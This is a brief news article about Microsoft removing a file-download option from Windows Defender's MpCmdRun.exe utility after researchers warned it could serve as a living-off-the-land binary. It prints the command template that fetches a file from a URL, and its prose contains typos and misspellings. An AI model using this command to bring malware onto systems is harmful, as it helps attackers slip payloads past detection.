Windows Defender ability to download file is removed now

The feature to download files using Windows Defender has been deleted recently by seeing the vulnerability that attackers could use to download malware into computer.

Last week, Microsoft added this ability to the Windows Defender for unknown reason. The concern was arisen from cybersecurity community who thought that Microsoft would allow Defender to be abused by attackers as a LOLBIN.

LOLBI or living-of-land-binaries are legitimate system files that could be abused for malicious purposes. TA505 APT group, ransomware attacks, and other malware attacks are major attacks in past using the Windows binaries and hence, the attack is not theoretical.

Users could simply download a file by running the Microsoft Antimalware Service Command Line Utility (MyCmdRun.exe) with the – DownloadFIle argument, as shown below:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

This way, users can download any files, including ransomware. The Activated Windows Defender would quickly detect this malware but other security software that may Windows programs to bypass detections may not detect this download.

On asking Microsoft why this feature was added, we get the answer, “Microsoft has nothing further to share.”

 Windows Defender Antimalware Client version 4.18.2009.2-0 was released yesterday with notable changes in MpCmdRun.exe feature. This time, the company removed the ability to download files via the MpCmdRun.exe command-line utility. “CmdTool: Invalid command line argument” error will be shown on screen now when users attempt to download a file using MyCmdRun.exe.

Removing this feature is a good step there is no need to give a platform to threat actors to distribute their malware and compromise our systems.